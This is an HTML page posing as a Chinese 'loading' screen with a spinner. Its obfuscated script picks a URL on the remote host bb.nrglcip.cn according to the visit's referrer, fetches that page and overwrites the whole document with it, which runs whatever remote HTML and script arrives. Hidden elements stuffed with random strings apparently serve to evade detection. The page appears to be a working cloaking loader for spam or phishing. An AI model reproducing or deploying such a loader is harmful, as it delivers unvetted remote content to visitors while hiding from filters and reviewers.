<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kEpjCk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kEpjCk .OuOasxqhH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kEpjCk .content {
            line-height: 50px;
            text-align: center
        }

        .kEpjCk .img {
            width: 100%
        }

        .kEpjCk .kvEIN5gE {
            text-align: center
        }

        .kEpjCk .kvEIN5gE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kEpjCk .kvEIN5gE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kEpjCk .kvEIN5gE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kEpjCk .kvEIN5gE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kEpjCk .kvEIN5gE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kEpjCk .kvEIN5gE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kEpjCk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function m7dtT1DQIaf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var r0lQjcB = m7dtT1DQIaf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ r0lQjcB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ r0lQjcB +".html?a=share";
		}
		
        cgTEknBMR=url+"#"+new Date().getTime();
        cgTEknBMR && function() {
            $.get(cgTEknBMR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >sBwsLcgh48BvbKtB6by9ehc9m3Wr27WcLv9cmnknG</li>
<span style='display:none'>YgIoWA5f2cV5jde</span>
<h1 style='display:none' >mkY7L9IeinPDDUSw4kZaTVdkloKXbFPIDM</h1>
<p  style='display:none'>exsthMQpcGr11NAI5wFVc2trt9sD8Vm73kNeD5Je7V7xJ6rd9NkitsMJcfVX2eeVqs9YKXTveDtWNySZcsI2IJO</p>
<h1 style='display:none' >mkY7L9IeinPDDUSw4kZaTVdkloKXbFPIDM</h1>
<img  src='' style='display:none'><div class="kEpjCk">
    <div class="OuOasxqhH">
        <div class="kvEIN5gE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >wOQNhAKQMCR0XrHvsmei98xFBPJO0xD</h1>
<ul style='display:none' >dQENN8sEQ07ykkWJxDkICNmwFURRImVrFlw6utEBAkuGxbIvSak</ul>
<ul style='display:none' >dQENN8sEQ07ykkWJxDkICNmwFURRImVrFlw6utEBAkuGxbIvSak</ul></body>
</html>